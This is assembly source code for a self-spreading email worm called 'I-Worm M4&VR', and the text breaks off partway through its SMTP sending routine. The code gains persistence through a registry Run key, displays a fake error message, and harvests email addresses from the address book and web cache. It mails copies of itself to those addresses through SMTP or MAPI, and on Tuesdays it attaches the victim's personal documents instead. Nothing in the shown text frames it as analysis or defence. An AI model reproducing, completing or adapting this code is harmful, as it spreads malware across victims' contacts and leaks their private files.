;-----------------------------------------------------------------------------
;-------------------------------     -----------------------------------------
;-----------------------------         ---------------------------------------
;--------------------------- I-Worm M4&VR ------------------------------------
;-----------------------------         ---------------------------------------
;-------------------------------     -----------------------------------------
;-----------------------------------------------------------------------------

.386p
.model flat

;--------------------------- Include Zone ------------------------------------

MEM_COMMIT		    		equ	00001000h
MEM_RESERVE		    		equ	00002000h
PAGE_READWRITE		    	equ	00000004h
PAGE_READONLY		    	equ	00000002h
FILE_ATTRIBUTE_NORMAL	    	equ	080h
OPEN_EXISTING		    	equ	03h
FILE_SHARE_READ		    	equ	01h
GENERIC_READ	 	    	equ	80000000h
FILE_MAP_WRITE		    	equ	00000002h
FILE_MAP_READ		    	equ	00000004h
CREATE_ALWAYS	            equ	2
GENERIC_WRITE	            equ	40000000h

;-------------------------- Macro Zone ---------------------------------------

@INIT_SehFrame  	macro	Instruction
	local   	OurSeh
      call    	OurSeh
      mov     	esp,[esp+08h]
      Instruction
OurSeh:
      xor     	edx,edx
      push    	dword ptr fs:[edx]
      mov     	dword ptr fs:[edx],esp
                	endm

@REM_SehFrame   	macro
      xor     	edx,edx
      pop     	dword ptr fs:[edx]
      pop     	edx
                	endm

@pushsz         	macro	string
      local   	Str
      call    	Str
      db      	string,0
Str:            	endm

api 			macro a
	extrn   	a:PROC
	call    	a
			endm

;------------------------ Constantes Zone ------------------------------------
       
SEH             	equ	1                    		; SEH protection

NbEmailWanted   	equ   150                        	; Nb Email to Seek >1 
EmailSize       	equ   64                         	; Attention rol eax,6 (2^6)
EmailFileSize   	equ   (EmailSize*(NbEmailWanted+1)) ; For VirtualAlloc (+Security)    
NbToSend        	equ   20                         	; Send x emails per session

NbPersoWanted	equ	20			   		; Nb Personal document to Seek
PersoSize		equ	256			   		; Attention rol eax,8 (2^8)
PersoFileSize	equ	(PersoSize*(NbPersoWanted+1)) ; For VirtualAlloc (+Security)

MimeHeaderSize	equ	1024					; Mime Header size

;-----------------------------------------------------------------------------
;--------------------------- Code Zone ---------------------------------------
;-----------------------------------------------------------------------------

.code

Mv:
    	pushad
               
      IF      	SEH
      @INIT_SehFrame <jmp ExitMv>             		; Init SEH      
      ENDIF
        
;------------------------- Check & Mark Presency -----------------------------

TryToOpenOurMutex:
      xor 		eax, eax
    	@pushsz	'MvMutex'                       	; Mutex Name                               
      push    	eax
      push    	eax
      api     	OpenMutexA                      	; already in mem
      or      	eax,eax
      jnz     	ExitMv                          	; Yes, do nothing more 
                  
CreateOurMutex:
      xor     	eax, eax
      @pushsz 	'MvMutex'                       	; Mutex Name                               
      push    	eax                             	; No owner
      push    	eax                             	; default security attrib
      api     	CreateMutexA                    	; create Our Mutex
      mov     	dword ptr[MutexHdl], eax

;---------------------------- Random Init ------------------------------------

RandomInit:
      api     	GetTickCount
      mov     	RandomNb, eax
 
;---------------------- Hide Process on Win9x --------------------------------
        
HideProcess:                                    
	@pushsz 	"KERNEL32.dll"
	api     	GetModuleHandleA
	@pushsz 	"RegisterServiceProcess"		; Error on NT
	push    	eax
	api     	GetProcAddress
	test    	eax, eax
	jz      	GetOurPathName
	push    	01h
	push    	00h
	call    	eax       
       
;----------------------- Copy Worm in Sys Dir --------------------------------

GetOurPathName:
      xor     	eax, eax
      push    	eax
	api     	GetModuleHandleA                	; Our Handle	  
      push    	260
	push    	offset MyPath
	push    	eax
	api     	GetModuleFileNameA              	; Our Path       
        
CreateDestPath:
      push    	260
	push    	offset TempPath&Name
	api     	GetSystemDirectoryA             	; System Dir

      @pushsz 	'\NETAV.EXE'
	push    	offset TempPath&Name
      api     	lstrcat                         	; Path+Name of File to Create   

CheckHowExecuted:
      push    	offset MyPath
      push    	offset TempPath&Name
      api     	lstrcmp
      test    	eax, eax
      jz      	AutoRun

CreateOurFile:
      xor     	eax, eax
      push    	eax                             	; Overwrite mode set
      push    	offset TempPath&Name            	
      push    	offset MyPath
      api     	CopyFileA                       	; Copy Worm in Sys Dir

        
;------------------------- Registry Worm -------------------------------------

RegWorm:
      push    	offset TempPath&Name
      api     	lstrlen          
	push    	eax
	push    	offset TempPath&Name
	push    	1
	@pushsz 	"NETAV Agent"
	@pushsz 	"Software\Microsoft\Windows\CurrentVersion\Run"
	push    	80000002h
	api     	SHSetValueA

;-------------------- First Launch Fake Message ------------------------------

FakeMessage:
 	push    	1040                         
      @pushsz 	'Setup'
      @pushsz 	'This file does not work on this system'
      push    	0
      api     	MessageBoxA

;---------------------- Check Email File & Create ----------------------------
AutoRun:

CheckEmailFile:
      call    	Clear_TempPath&Name        

      push    	260
      push    	offset TempPath&Name
	api     	GetSystemDirectoryA             	; System Dir
        
      push    	offset TempPath&Name
      api     	SetCurrentDirectoryA            	; Set sys dir

      push    	offset search                   	; Push it
      @pushsz 	'ICMAIL.DLL'                    	; Mask
      api     	FindFirstFileA                  	; find file    
      inc     	eax
      jnz     	UpDateEmailList                 	; The File Exist       
        
      call    	CreateEmailFile                 	; Create It if Does not exist

;----------------------- Check if Update Time --------------------------------

UpDateEmailList:
      lea     	esi,SystemTimeData
      push    	esi
      api     	GetSystemTime
        
      movzx   	edx, word ptr[esi+4]            	; Esi point day of week
      cmp     	edx, 4                          	; Jeudi ?
      jne     	Check_if_Connected              	; No

      call    	CreateEmailFile                 	; Yes, Update Email File

;-------------------------- Spread the Worm ----------------------------------
     
Check_if_Connected:
      push    	offset SystemTimeData
      api     	GetSystemTime

      push    	0
      push    	offset IConnectedStateTemp
      api		InternetGetConnectedState
      dec     	eax
      jnz    	No_internet                     	; No connection

      call    	SendEmail                       	; Send Wab Emails + Rnd Email
      jmp     	ExitMvMutex                     	; Then Bye

No_internet:
      push    	5*60*1000                         	; 5 min
      api     	Sleep
      jmp     	Check_if_Connected
              
;----------------------------- The End ---------------------------------------

ExitMvMutex:
      push    	dword ptr[MutexHdl]
      api     	CloseHandle

ExitMv:
	call		FreeTheMem

      IF      	SEH
      @REM_SehFrame                           		; Restore SEH
      ENDIF
         
      popad
                
      push    	0
      api     	ExitProcess                     	; Quit


	db		'---iworm.mv4&vr.by.tony/mvcrew---',0dh,0dh


;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
;------------------------- Sub Routine Zone ----------------------------------
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------


;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
;........................ Major Sub Routine ..................................
;............................ Z O N E ........................................
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::


;...................... Create The Email File ................................
;.............................................................................

; OUT : Email File in System Dir : ICMAIL.DLL

CreateEmailFile:
	mov		dword ptr[NbEmailFound], 0

ReserveMem_For_EmailListe:
      xor     	eax,eax
      push    	PAGE_READWRITE                  	; read/write page
	push    	MEM_RESERVE or MEM_COMMIT
	push    	EmailFileSize
	push    	eax                             	; System decide where 
	api     	VirtualAlloc
	or      	eax,eax
	jz      	EmailFileError                  	; Alloc Fail 
      mov     	dword ptr[EmailList], eax

EmailSeeker:
      call    	SearchWabFile_Email             	; Search Email address book
      call    	SearchHtmFile_Email             	; Search Email HTML

CreateTheEmailFile:
      call    	Clear_TempPath&Name
            
      push    	260
	push    	offset TempPath&Name
	api     	GetSystemDirectoryA             	; System Dir
      @pushsz 	'\ICMAIL.DLL'
	push    	offset TempPath&Name
      api     	lstrcat                         	; Path+Name of File to Create                          
      xor     	eax,eax
      push    	eax
      push    	eax
      push    	CREATE_ALWAYS
      push    	eax
      push    	FILE_SHARE_READ 
      push    	GENERIC_WRITE        
      push    	offset TempPath&Name
      api     	CreateFileA
      inc     	eax
      jz      	EmailFileError
      dec     	eax
      mov     	[TempFileHandle], eax
        
      push    	0
      push    	offset ByteWritten
      push    	EmailFileSize                 	; Copy Listes d'Emails
      push    	dword ptr [EmailList]
      push    	[TempFileHandle]
      api     	WriteFile

      push    	dword ptr [TempFileHandle]
      api     	CloseHandle        
        
EmailFileError:
      ret


;........................ Find Email in HTML .................................
;.............................................................................

; Recursive Search from Internet Path for Email in Html

SearchHtmFile_Email:
      call    	Clear_TempPath&Name     
        
	push    	00h
	push    	20h						; Internet Path      
	push    	offset TempPath&Name
	push    	00h
	api		SHGetSpecialFolderPathA

	push    	offset TempPath&Name
	api     	SetCurrentDirectoryA			; Selected dir = Internet Path

	lea		eax, SeekHtmlCurrentDir
	mov		dword ptr[RoutineToCall], eax
	call    	AllSubDirSearch				; Action = SeekHtmlCurrentDir
	ret	  

;.............. Seek Html in Current Dir

; IN:			Selected Current dir
; OUT:  		Emails in reserved Mem
        
SeekHtmlCurrentDir:
      cmp     	dword ptr[NbEmailFound], NbEmailWanted 	; ENOUGH EMAILS FOUND !
      je      	HtmlEmailSearchEnd                     	; YES...

      lea     	edi, search
      push    	edi
	@pushsz 	'*.*htm*'
	api     	FindFirstFileA		
	inc		eax
	jne		SeekEmail_Html
	ret

SeekEmail_Html:	
      dec		eax
	xchg    	eax,esi

SeekEmail_Html_Loop:

      call    	SeekEmail_In_ThisHtml		       	; Parse Html 4 emails
        
      cmp     	dword ptr[NbEmailFound], NbEmailWanted 	; ENOUGH EMAILS FOUND !
      je      	HtmlEmailSearchFin                     	; YES...
      					
	push    	edi				
	push    	esi
	api     	FindNextFileA				
	dec     	eax
	je      	SeekEmail_Html_Loop

HtmlEmailSearchFin:
	push    	esi
	api     	FindClose				
HtmlEmailSearchEnd:	
      ret

;.............. Parse Html for emails

SeekEmail_In_ThisHtml:
	pushad
	push    	0
	push    	FILE_ATTRIBUTE_NORMAL
	push    	OPEN_EXISTING
	push    	0
	push    	FILE_SHARE_READ
	push    	GENERIC_READ
      lea     	eax, [search.FileName]
	push    	eax
	api     	CreateFileA				
	inc     	eax
	je		HtmlEmailSearchEnd            	; Only ret for the call
	dec		eax                             	; Not the total end 
	xchg    	eax,ebx

	xor		eax,eax
	push    	eax
	push    	eax
	push    	eax
	push    	PAGE_READONLY
	push    	eax
	push    	ebx
	api     	CreateFileMappingA			
	test    	eax,eax
	je		CloseHtmlHandle
	xchg    	eax,ebp

	xor		eax,eax
	push    	eax
	push    	eax
	push    	eax
	push    	FILE_MAP_READ
	push    	ebp
	api     	MapViewOfFile				
	test    	eax,eax
	je		CloseHtml_MapHandle
	xchg    	eax,esi
      mov     	[maphandlemail],esi
      mov     	[esi_save],esi

	push    	0
	push    	ebx
	api     	GetFileSize				
	xchg    	eax,ecx
	jecxz   	CloseHtml_MapViewHandle
      inc     	ecx
      jz      	CloseHtml_MapViewHandle         	; GetFileSize Error ?
      dec     	ecx
FixBugOverflow:
      sub     	ecx, 8
      cmp     	ecx, 0
      jl      	CloseHtml_MapViewHandle

SeekMailToStr:
      mov     	esi,[esi_save]        
	call    	MTStr
	db		'mailto:'
MTStr: 
	pop		edi

ScanFor_MailTo:
	pushad
	push    	7
	pop		ecx
	rep		cmpsb						; search for "mailto:"
	popad								; string
	je		MailToFound_CheckEmail		      ; check the mail address
	inc		esi
      dec     	ecx
	jnz     	ScanFor_MailTo		

CloseHtml_MapViewHandle:
	push    	[maphandlemail]
	api     	UnmapViewOfFile		
CloseHtml_MapHandle:
	push    	ebp
	api     	CloseHandle				
CloseHtmlHandle:
	push    	ebx
	api     	CloseHandle				
	popad
	ret

MailToFound_CheckEmail:
      inc     	esi
      mov     	[esi_save],esi
      dec     	esi

	mov		edi, dword ptr [EmailList]      	   
      mov     	edx, dword ptr [NbEmailFound]
      rol     	edx, 6                          	; 64 = email size stockage
      add     	edi, edx                        	; goto next place
        
      mov     	[EmailCurrentPos], edi
        
	xor		edx,edx
	add		esi,7
	push    	edi						; mail address

NextChar:	
      lodsb
	cmp		al, ' '
	je		SkipChar

	cmp		al, '"'                        	; eMail End ?
	je		EndChar
      cmp     	al, '?'                        	; eMail End ?
      je      	EndChar    
      cmp     	al, '>'                        	; eMail End ?
      je      	EndChar      
      cmp     	al, '<'                        	; eMail End ?
      je      	EndChar      
      cmp     	al, ']'                        	; eMail End ?
      je      	EndChar              
	cmp		al, ''''                       	; eMail End ?
	je		EndChar

	cmp		al, '@'                        	; Valid email ?
	jne		CopyChar
	inc		edx
CopyChar:	  
      stosb
	jmp		NextChar
SkipChar:
	inc		esi
	jmp		NextChar
EndChar:	
      xor		al,al
	stosb
	pop		edi
	test    	edx,edx					; if EDX=0, mail is not
	je		SeekMailToStr				; valid (no '@')
      
      cmp     	dword ptr [NbEmailFound], 0
      je      	NoEmailYet
       
      mov     	edi, [EmailCurrentPos]
      mov     	eax, [edi]
      sub     	edi, 64
      cmp     	eax, [edi]
      je      	SeekMailToStr
        
NoEmailYet:     
      inc     	dword ptr [NbEmailFound]       
      cmp     	dword ptr[NbEmailFound], NbEmailWanted 	; ENOUGH EMAILS FOUND !
      je      	CloseHtml_MapViewHandle                	; YES...        
        
	jmp		SeekMailToStr			       	; get next email address


;........................ Find Email in WAB ..................................
;.............................................................................

SearchWabFile_Email:
      call    	Clear_TempPath&Name

GetWabPath:       
      mov     	dword ptr[KeySize], 260         	; Init Size to get
        
	push    	offset KeySize
	push    	offset TempPath&Name
	push    	offset Reg
	push    	0  
	@pushsz 	"Software\Microsoft\Wab\WAB4\Wab File Name"
	push    	80000001h
	api		SHGetValueA
      test    	eax, eax
      jne     	EndWab

Open&Map_WabFile:
	call		Open&MapFile
	jc		EndWab
        
WabSearchEmail:
      mov     	ecx, [eax+64h]                  	; Nb of address
      jecxz   	WabUnmapView                    	; No address
      mov     	dword ptr[NbEmailFound], ecx    	; For the Html search
      mov     	[NbWabEmail],ecx                	; For the emailfile
TruncFriend:        
      cmp     	ecx, NbEmailWanted              	; Too many Friend
      jbe     	NotManyFriend
      mov     	ecx, NbEmailWanted              	; To many @, reduce it
      dec     	ecx                             	; for Html search (inc [NbEmailFound]!)
      mov     	dword ptr[NbEmailFound], ecx    	; For the Html search
      mov     	[NbWabEmail],ecx                	; For the emailfile                
NotManyFriend:        
      mov     	esi, [eax+60h]                  	; email @ array
      add     	esi, eax                        	; normalise
      mov     	edi, dword ptr[EmailList]       	; where store email

GetWabEmailLoop:
      call    	StockWabEmail
      dec     	ecx
      jnz     	GetWabEmailLoop

WabUnmapView:        
	call		Open&MapFileUnmapView

EndWab:
      ret

StockWabEmail:        
      push    	ecx esi   
      push    	40h
      pop     	ecx
      cmp     	byte ptr [esi+1],0
      jne     	StockWabEmailLoop
        
StockWabEmailUnicodeLoop:
      lodsw                                   		; Unicode
      stosb                                   		; Ansi
      dec     	ecx
      test    	al, al
      jne     	StockWabEmailUnicodeLoop
      add     	edi, ecx                        	; next email field in Dest
      pop     	esi ecx
      add     	esi, 44h                        	; next email field in Wab
      ret

StockWabEmailLoop:
      movsb                                   		; Ansi
      dec     	ecx
      test    	al, al
      jne     	StockWabEmailLoop
      add     	edi, ecx                        	; next email field in Dest
      pop     	esi ecx
      add     	esi, 24h                        	; next email field in Wab
      ret

;..................... Send Email SMTP or MAPI ...............................
;.............................................................................

; OUT:  Send via SMTP or MAPI #NbToSend Ramdom EmailAddress from EmailFile


SendEmail:
	call		MapEmailFile				; Map The Email File
	jnc		HowToSend
	ret
	
HowToSend:
      mov     	byte ptr[SmtpFlag], 0    		; init flag to 0     
      call    	GetUserSmtpServer				; Default Smtp Serveur Found ?
      jc      	MapiSendVersion    			; No
      not     	byte ptr[SmtpFlag]       		; flag = 1

MapiSendVersion:
      not     	byte ptr[SmtpFlag]       		; flag=0 if SMTP, flag=1 -> MAPI    

MapEmailFileOk:
      lea     	esi, SystemTimeData              
      movzx   	ecx, word ptr[esi+4]            	; Esi point day of week
	cmp		ecx, 2					; Mardi
	jne		_NormalSend
	mov		byte ptr[PayloadFlag], 1
	call		PersonalDocSearch				; Personal doc path in mem

_NormalSend:
	call		NormalSendInit				; init attachement 4 Normal Send
    
      mov     	ebx, NbToSend                   	; Send NbToSend emails per session
SendRandomEmailLoop:
      call    	SelectEmail                     	; return email ads in esi
	jecxz   	SendBye					; EmailFile empty or NonExploitable

      lea     	edi, CurrentEmail               	; <-----------------
      mov     	ecx, EmailSize                  	;                   |
      rep     	movsb                           	; Copy rnd Email in |

	xor		al, al
	sub     	esi, EmailSize
	xchg    	edi, esi
      mov     	ecx, EmailSize
	rep		stosb						; Remove email sent in EmailFile

PaySendTime:
	cmp		byte ptr[PayloadFlag], 0
	je		NormalSend
	call		PayloadSendInit				; Personals doc name in MyPath
	
NormalSend:       
	call		BuildMessageHeader			; build the mime header

      cmp     	byte ptr[SmtpFlag], 0
      jne     	MapiSendIt                      	; flag=1 -> MAPI

      call    	SmtpConnection
      jc      	MapiSendIt					; smtp error -> mapi send
      call    	SmtpSendCommand
      jc      	MapiSendIt					; smtp error -> mapi send
	call    	SmtpDisConnection
	jmp		SendNext					; If here No Mapi Needed

MapiSendIt:
      call    	MapiSend

SendNext:        
	cmp		byte ptr[PayloadFlag], 0
	je		NormalSendNext
	call		ReleasePayMem
NormalSendNext:
	call		ClearHeaderMem
      dec     	ebx
      jnz     	SendRandomEmailLoop             	; Send #NbToSend emails

SendBye:        
	jmp		Open&MapFileUnmapView			; Clean De-map EmailFile


;.............. Select Email to Send 

; OUT:  		esi point on the email   
;       		ecx = 0 if error
;       		select first the email from the *.WAB

SelectEmail:
	mov		ecx, NbEmailWanted
	inc		ecx
SelectIT:
	dec		ecx
	jz		SelectEmailError		

      mov     	esi, dword ptr [mapaddress]     	; emails from file in memory

	mov		edi, NbEmailWanted			; Rnd Range
      call    	GetRndNumber                    	; Rnd Nb in edx

      cmp     	dword ptr[NbWabEmail], 0
      je      	TriEMails
        
	dec		dword ptr[NbWabEmail]
	mov		edx, dword ptr[NbWabEmail]

TriEMails:      
      rol     	edx, 6                          	; edx*emailsize (64)        
      add     	esi, edx                        	; esi on the email
  
      mov     	eax, dword ptr [esi]
      test    	eax, eax                        	; No empty email
      je      	SelectIT
      mov     	eax, dword ptr [esi]
      or      	eax, 20202020h                  	; Lower case
      cmp     	eax, 'mbew'                     	; No webmaster@xxxxxxxx
      je      	SelectIT
      mov     	eax, dword ptr [esi]
      or      	eax, 20202020h                  	; Lower case
      cmp     	eax, 'ptth'                     	; No http:\\xxxxxxxxxxx
      je      	SelectIT
SelectEmailError:	  
      ret

;.............. Normal Init The Attachement File 

; Routine appel�e tout le temps (Payload ou pas) -> Init du mess: header + body

NormalSendInit:

InitWhoSendName:
	call		ResMemHeader				; Some Mem for the mime header

      mov     	dword ptr[KeySize], 00000040h   	; Init Size to get

	push   	offset KeySize
	push    	offset mailfrom
	push    	offset Reg
      @pushsz 	"SMTP Email Address"          	; User mail (for mail from:)
      lea     	eax, AccountKey
      push    	eax
	push    	80000001h
	api     	SHGetValueA
	test		eax, eax
	je		InitWormName
	mov		byte ptr[UserEmailFoundFlag], 1

InitWormName:
      xor     	al,al
      mov     	ecx,260
      lea     	edi, MyPath  
      rep     	stosb
        
      push    	260
	push    	offset MyPath
	api     	GetSystemDirectoryA             	; System Dir

      @pushsz 	'\NETAV.EXE'
	push    	offset MyPath
      api     	lstrcat                         	; Path+Name 4 Mapi Send&Smtp CodeB64File  

SmtpNormalSendInit:	
	call		CodeB64File  				; return worm file encoded in mem

	ret

;.............. Build Message Header

BuildMessageHeader:
	push		ebx						; for the loop

	cmp		byte ptr[UserEmailFoundFlag], 0
	je		BuildHeader	

CreateNameFrom:
	xor		al, al
	lea		edi, mailfrom
	mov		ecx, EmailSize
	rep		stosb

	push		NbFromName					; nb name
	pop		edi
	call		GetRndNumber				; edx = rnd nb
	
	lea		edi, RndFromNameTb
	rol		edx, 2					; table de dd
	add		edi, edx					; Point the right Name offset
	mov		edi, [edi]
	
	push 		edi						; User mail not found -> fix another name
	push		offset mailfrom
	api		lstrcat

CreateServFrom:
	push		NbFromServ					; nb serv
	pop		edi
	call		GetRndNumber				; edx = rnd nb
	
	lea		edi, RndFromServTb
	rol		edx, 2					; table de dd
	add		edi, edx					; Point the right Serv offset
	mov		edi, [edi]
	
	push 		edi						; User mail not found -> fix another name
	push		offset mailfrom
	api		lstrcat

BuildHeader:
	mov		esi, dword ptr[MemMessageBody1]	; some mem

BuildFrom:
      @pushsz 	'From: '					; From: 
	push    	esi
      api     	lstrcat                          

	push		offset mailfrom				; user mail or another fixed
	push		esi
	api		lstrcat

	@pushsz	CRLF
	push		esi
	api		lstrcat

BuildTo:
	@pushsz	'To: '					; To:
	push		esi
	api		lstrcat
	
	push		offset CurrentEmail			; Email found in *.wab or Html
	push		esi
	api		lstrcat
	
	@pushsz	CRLF
	push		esi
	api		lstrcat
	
BuildSubject:
	@pushsz	'Subject: '					; Subject:
	push		esi
	api		lstrcat
	
	push		NbSubject					; nb Subject
	pop		edi
	call		GetRndNumber				; edx = rnd nb
	
	lea		edi, RndSubjectTb
	rol		edx, 2					; table de dd
	add		edi, edx					; Point the right Subject offset
	mov		edi, [edi]

	push 		edi						; Rnd Subject
	push		esi
	api		lstrcat
	
	@pushsz	CRLF
	push		esi
	api		lstrcat

BuildBody:
	push 		offset MessageBody1			; Mime bordel jusqu'a -> email message
	push		esi
	api		lstrcat

BuiltEmailMessage:
	push		NbRndText					; nb Text
	pop		edi
	call		GetRndNumber				; edx = rnd nb
	
	lea		edi, RndTextTb
	rol		edx, 2					; table de dd
	add		edi, edx					; Point the right Text offset
	mov		edi, [edi]

	push 		edi						; Rnd Text
	push		esi
	api		lstrcat

BuildBody1b:
	push 		offset MessageBody1b			; email message -> name=
	push		esi
	api		lstrcat

	cmp		byte ptr[PayloadFlag],0
	jne		BuildFileNamePay

BuildFileNameNormal:
	push		NbRndFileName				; nb FileName
	pop		edi
	call		GetRndNumber				; edx = rnd nb
	
	lea		edi, RndFileNameTb
	rol		edx, 2					; table de dd
	add		edi, edx					; Point the right Text offset
	mov		edi, [edi]
	
	push 		edi						; Rnd File in name=
	push		esi
	api		lstrcat

	@pushsz	CRLF
	push		esi
	api		lstrcat

	push 		offset MessageBody1c			; .EXE",CRLF -> filename=
	push		esi
	api		lstrcat

	push 		edi						; Rnd File in filename=
	push		esi
	api		lstrcat

	@pushsz	CRLF
	push		esi
	api		lstrcat
	@pushsz	CRLF
	push		esi
	api		lstrcat

	jmp		BuildSizeBody1

BuildFileNamePay:
	call		Clear_TempPath&Name

	push		260
	push		offset TempPath&Name
	push		offset MyPath
	api		GetFileTitleA

	@pushsz	'"'
	push		esi
	api		lstrcat

	push		offset TempPath&Name
	push		esi
	api		lstrcat

	@pushsz	'"'
	push		esi
	api		lstrcat

	@pushsz	CRLF
	push		esi
	api		lstrcat

	push 		offset MessageBody1c			; .EXE",CRLF -> filename=
	push		esi
	api		lstrcat

	@pushsz	'"'
	push		esi
	api		lstrcat

	push		offset TempPath&Name
	push		esi
	api		lstrcat

	@pushsz	'"'
	push		esi
	api		lstrcat

	@pushsz	CRLF
	push		esi
	api		lstrcat
	@pushsz	CRLF
	push		esi
	api		lstrcat

BuildSizeBody1:
	push		esi	
	api		lstrlen

	mov		dword ptr[MessageSize1], eax		; Header+Mime bordel lenght for send cmd

BuildMessageHeaderError:
	pop		ebx						; for the loop
	ret

;.............. Payload Init The Attachement File

PayloadSendInit:
	push		ebx						; For The send Loop

	mov		edi, dword ptr[NbPersonalFound]	; Rnd Range
      call    	GetRndNumber                    	; Rnd Nb in edx

PayMapiSendInit:
      xor     	al,al
      mov     	ecx,260
      lea     	edi, MyPath                
      rep     	stosb

	mov		esi, dword ptr [PersoDocListe]
	rol		edx, 8
	add		esi, edx					; esi = perso doc path
	lea		edi, MyPath
	mov		ecx, 256					; Perso path size
	rep		movsb

PaySmtpSendInit:
	call		CodeB64File					; return perso file encoded in mem
	
	pop		ebx						; For The send Loop	
      ret               

;.............. Some Mem For The Mime Header

ReleasePayMem:
	push		ebx

	mov		ecx, dword ptr [MemEncoded]
	call		MemFreeIt
	mov		ecx, dword ptr [MemToEncode]
	call		MemFreeIt

	pop		ebx
	ret

ClearHeaderMem:
      xor     	al,al
      mov     	ecx, MimeHeaderSize
	mov		edi, dword ptr[MemMessageBody1]
      rep     	stosb
	ret

;.............. Some Mem For The Mime Header

ResMemHeader:
      xor     	eax,eax
      push    	PAGE_READWRITE                  	; read/write page
	push    	MEM_RESERVE or MEM_COMMIT
	push    	MimeHeaderSize
	push    	eax                             	; System decide where 
	api     	VirtualAlloc
	mov		dword ptr[MemMessageBody1], eax
	ret
   
;.............. Map The Email File

;OUT:			eax = mapaddress
;			cf  = 0	if no error

MapEmailFile:
      call    	Clear_TempPath&Name 
        
      push    	260
	push    	offset TempPath&Name
	api     	GetSystemDirectoryA
      @pushsz 	'\ICMAIL.DLL'
	push    	offset TempPath&Name
      api     	lstrcat                         	; Path+Name                  
   
	call		Open&MapFile
     	ret


;.......................... Send Via MAPI ....................................
;.............................................................................


MapiSend:
	push		ebx						; For The send Loop

      xor     	eax, eax
      push    	eax
      push    	eax
      push    	offset MapiMessage
      push    	eax
      push    	dword ptr [MAPISession]
      api     	MAPISendMail

	pop		ebx						; For The send Loop
      ret


;........................... Send via SMTP ...................................
;.............................................................................

; 4 Part: 
;         		- GetLocalSmtpServeur: Find default SMTP server
;         		- SmtpConnection:      Init Socket + Connect to Smpt host
;         		- SmtpSendCommand:     Send all the commands
;         		- SmtpDisConnection:   Clean + Disconnect


;.............. Get User Server

GetUserSmtpServer:

GetUserInternetAccount:
      mov     	dword ptr[KeySize], 00000040h   	; Init Size to get
         
	push    	offset KeySize
	push    	offset AccountSubKey
	push    	offset Reg
	@pushsz 	"Default Mail Account"
	@pushsz 	"Software\Microsoft\Internet Account Manager"
	push    	80000001h
	api     	SHGetValueA
      test    	eax, eax
      jne     	GetUserSmtpServerError

GetUserInternetServer:
      mov     	dword ptr[KeySize], 00000040h   	; Init Size to get

	push    	offset KeySize
	push    	offset SmtpServeur
	push    	offset Reg
	@pushsz 	"SMTP Server"
      lea     	eax, AccountKey
      push    	eax
	push    	80000001h
	api     	SHGetValueA
      test    	eax, eax
      jne     	GetUserSmtpServerError        
      clc
      ret       
GetUserSmtpServerError:
      stc
      ret

;.............. Smtp Connection
                                                
SmtpConnection:
	pushad
	push    	offset WSAData                  	; Struct WSA
	push    	101h                        		; VERSION1_1
	api     	WSAStartup					; Socket Init
	test    	eax,eax                         	; ok ?
	jne		WSA_Error                       	; No, exit with stc 

	push    	0                               	; Protocol = 0 (more sure)
	push    	1                               	; SOCK_STREAM
	push    	2                               	; AF_INET (most used)
	api     	socket					; create socket
	inc		eax                             	; -1 = error
	je		Socket_Error                    	; WSACleanUp and stc
	dec		eax
	mov		[hSocket],eax                   	; Socket Handle

	push		25						; Smtp port
	api		htons						; Convert it
	mov		word ptr[wsocket+2], ax			; The port ( 2 ptr[wsocket]=AF_INET )

	push    	offset SmtpServeur              	; The SMPT Host
	api     	gethostbyname				; SMPT to IP
	test    	eax,eax                         	; error ?
	je		Error_CloseSocket&CleanUp       	; Exit + stc                
	mov		eax,[eax+10h]                   	; get ptr 2 IP into HOSTENT
	mov		eax,[eax]                       	; get ptr 2 IP
	mov		[ServeurIP],eax				; Save it

	push    	010h		          			; size of sockaddr struct
	push    	offset wsocket                  	; Ptr on it
	push    	[hSocket]                       	; Handle
	api     	connect					; connect to smtp server
	inc		eax
	je		Error_CloseSocket&CleanUp       	; Exit + stc
	call    	GetServeurReply				; get server response
	jc		Error_CloseSocket&CleanUp       	; If c=0 Connection OK !
	popad
	clc
	ret

GetServeurReply:
	push    	0                               	; Flags
	push    	4                               	; Get a LongWord
	push    	offset ServeurReply             	; in ServeurReply
	push    	[hSocket]
	api     	recv                            	; get stmp server error code
	cmp		eax, 4                          	; Receive a LongWord  
	jne		ReplyError                      	; No, stc

ServeurReplyLoop:	
      mov		ebx, offset ServeurReplyEnd     	; Get a byte In
	push    	0                               	; Flags
	push    	1                               	; a byte
	push    	ebx
	push    	[hSocket]
	api     	recv
	jne		ReplyError

	cmp		byte ptr [ebx], 0Ah
	jne     	ServeurReplyLoop				; skip over CRLF

	mov		eax, [ServeurReply]
	cmp		eax, ' 022'					
	je		ReplyOk
	cmp		eax, ' 052'					
	je		ReplyOk
	cmp		eax, ' 152'					
	je		ReplyOk
	cmp		eax, ' 453'					
	jne		ReplyError
ReplyOk:	  
      clc
	ret
ReplyError:	
      stc
	ret

;.............. Smtp DisConnection

SmtpDisConnection:
	pushad
Error_CloseSocket&CleanUp:
	push    	dword ptr [hSocket]
	api     	closesocket
Socket_Error:
      api     	WSACleanup        
WSA_Error:	
      popad
	stc
	ret

;.............. Smtp Send

SmtpSendCommand:
	pushad

SendHelloCmd:
	mov     	esi,offset cmd_helo          		; 'HELO xxx',CRLF
	push    	14                              	; cmd size
	pop		ecx                             	; cmd size
	call    	SendSocket					; send HELO command
	call    	GetServeurReply                 	; Ok ?
	jc      	Error_CloseSocket&CleanUp       	; No

SendMailFromCmd:
	mov		esi,offset cmd_mailfrom         	; 'MAIL FROM:<'
	push    	11                              	; cmd size
	pop     	ecx                             	; size
	call    	SendSocket					; send MAIL FROM command

	mov		esi,offset mailfrom             	; ptr default user email
	push		esi
	api		lstrlen
	xchg		ecx, eax
	call    	SendSocket                        	; 2� Write xxxx@xxxx.xx

	call		Brk1
	db		'>',CRLF
Brk1:	pop		esi
	push    	3
	pop		ecx	
	call    	SendSocket					; 3� Write '>',CRLF

	call    	GetServeurReply                 	; Ok
	jc		Error_CloseSocket&CleanUp       	; No

SendRcptToCmd:
	mov		esi,offset cmd_rcptto           	; 'RCPT TO:<'
	push    	9                               	; cmd size
	pop     	ecx                             	; cmd size
	call    	SendSocket                    	; 1� Write 'RCPT TO:<'

	mov		esi,offset CurrentEmail         	; ptr email
	push		esi
	api		lstrlen
	xchg		ecx, eax
	call    	SendSocket                        	; 2� Write xxxx@xxxx.xx

	call		Brk2
	db		'>',CRLF
Brk2:	pop		esi
	push    	3
	pop		ecx	
